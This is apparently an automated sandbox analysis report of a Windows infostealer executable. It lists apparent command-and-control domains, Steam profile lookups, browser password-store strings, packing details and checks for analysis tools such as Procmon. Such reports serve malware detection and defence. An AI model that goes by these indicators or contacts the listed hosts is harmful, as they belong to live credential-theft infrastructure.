Source: jSFUzuYPG9.exe, 00000000.00000002.1978820464.0000000005EA0000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://energyaffai.lat/
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://energyaffai.lat:443/api=
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grannyejh.lat:443/api$
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbW4pDk4pbW4CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449631848.0000000005DE9000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496926553.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/$
Source: jSFUzuYPG9.exe, 00000000.00000003.1499562858.00000000016AD000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496634027.00000000016AD000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/(
Source: jSFUzuYPG9.exe, 00000000.00000003.1377203938.0000000001643000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/;#
Source: jSFUzuYPG9.exe, 00000000.00000003.1503367949.00000000016AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/X236
Source: jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1427112957.0000000005DF2000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/api
Source: jSFUzuYPG9.exe, 00000000.00000003.1503367949.00000000016AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/api8
Source: jSFUzuYPG9.exe, 00000000.00000003.1496559642.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496926553.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/cE
Source: jSFUzuYPG9.exe, 00000000.00000003.1474837277.0000000005DEB000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1474953402.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496559642.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496926553.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/h
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/pi
Source: jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com/x
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lev-tolstoi.com:443/api
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.s7
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacebudi.lat:443/api
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.nP
Source: jSFUzuYPG9.exe, 00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.000000000160C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001612000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Per
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1326699154.000000000164A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sustainskelet.lat/
Source: jSFUzuYPG9.exe, 00000000.00000003.1326699154.000000000164A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sustainskelet.lat/api
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sustainskelet.lat/d
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001612000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sustainskelet.lat:443/apis
Source: jSFUzuYPG9.exe, 00000000.00000003.1326717702.0000000001612000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sweepyribs.lat:443/api
Source: jSFUzuYPG9.exe, 00000000.00000002.1978820464.0000000005EA0000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1978648025.0000000005DEE000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650331080.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_f6f292994d7c60be109e4c185cbc03032d36d17160d4e639
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1650254740.000000000169B000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976667744.000000000169F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: jSFUzuYPG9.exe, 00000000.00000003.1403127222.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403040577.0000000005E2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: jSFUzuYPG9.exe, 00000000.00000003.1452578134.0000000005E06000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.8Z86fTxZfkM6
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.UnUp0v0CLe9Y
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: jSFUzuYPG9.exe, 00000000.00000003.1451620554.0000000005F0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: jSFUzuYPG9.exe, 00000000.00000003.1377039014.00000000016A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.11:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.11:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.216.152.124:443 -> 192.168.2.11:49777 version: TLS 1.2

System Summary

Source: jSFUzuYPG9.exe Static PE information: section name:
Source: jSFUzuYPG9.exe Static PE information: section name: .rsrc
Source: jSFUzuYPG9.exe Static PE information: section name: .idata
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016AF430 0_3_016AF430
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7428 -s 2140
Source: jSFUzuYPG9.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: jSFUzuYPG9.exe Static PE information: Section: ZLIB complexity 0.9974114404965754
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@2/5@13/4
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7428
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\f51efc0a-74d9-4ec7-9c39-26d8e1893b37
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: jSFUzuYPG9.exe, 00000000.00000003.1403414219.0000000005E1A000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1428084440.0000000005E11000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1403726937.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1427969651.0000000005E1B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: jSFUzuYPG9.exe ReversingLabs: Detection: 63%
Source: jSFUzuYPG9.exe Virustotal: Detection: 50%
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe File read: C:\Users\user\Desktop\jSFUzuYPG9.exe
Source: unknown Process created: C:\Users\user\Desktop\jSFUzuYPG9.exe "C:\Users\user\Desktop\jSFUzuYPG9.exe"
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7428 -s 2140
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Section loaded: version.dll
Source: jSFUzuYPG9.exe Static file information: File size 2870272 > 1048576
Source: jSFUzuYPG9.exe Static PE information: Raw size of trstwfmm is bigger than: 0x100000 < 0x294c00

Data Obfuscation

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Unpacked PE file: 0.2.jSFUzuYPG9.exe.c50000.0.unpack :EW;.rsrc :W;.idata :W;trstwfmm:EW;ekycdelp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;trstwfmm:EW;ekycdelp:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: jSFUzuYPG9.exe Static PE information: real checksum: 0x2c69ff should be: 0x2c313f
Source: jSFUzuYPG9.exe Static PE information: section name:
Source: jSFUzuYPG9.exe Static PE information: section name: .rsrc
Source: jSFUzuYPG9.exe Static PE information: section name: .idata
Source: jSFUzuYPG9.exe Static PE information: section name: trstwfmm
Source: jSFUzuYPG9.exe Static PE information: section name: ekycdelp
Source: jSFUzuYPG9.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016B2E78 push esp; ret 0_3_016B2E79
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016B2E48 push edx; ret 0_3_016B2E49
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016B4E4C push ecx; iretd 0_3_016B4E51
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016ACE40 pushad ; iretd 0_3_016ACE41
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016AD158 pushad ; iretd 0_3_016AD159
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016B1150 pushad ; iretd 0_3_016B1159
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016ACE55 pushad ; iretd 0_3_016ACE59
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016ACE10 pushad ; iretd 0_3_016ACE11
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016AD0E0 pushad ; iretd 0_3_016AD0E1
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016AD2D8 pushad ; iretd 0_3_016AD2D9
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016AFA8F push 00000001h; iretd 0_3_016AFAA0
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Code function: 0_3_016AFA81 push 00000001h; iretd 0_3_016AFAA0
Source: jSFUzuYPG9.exe Static PE information: section name: entropy: 7.9813529381203026

Boot Survival

Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Window searched: window name: RegmonClass Jump to behavior
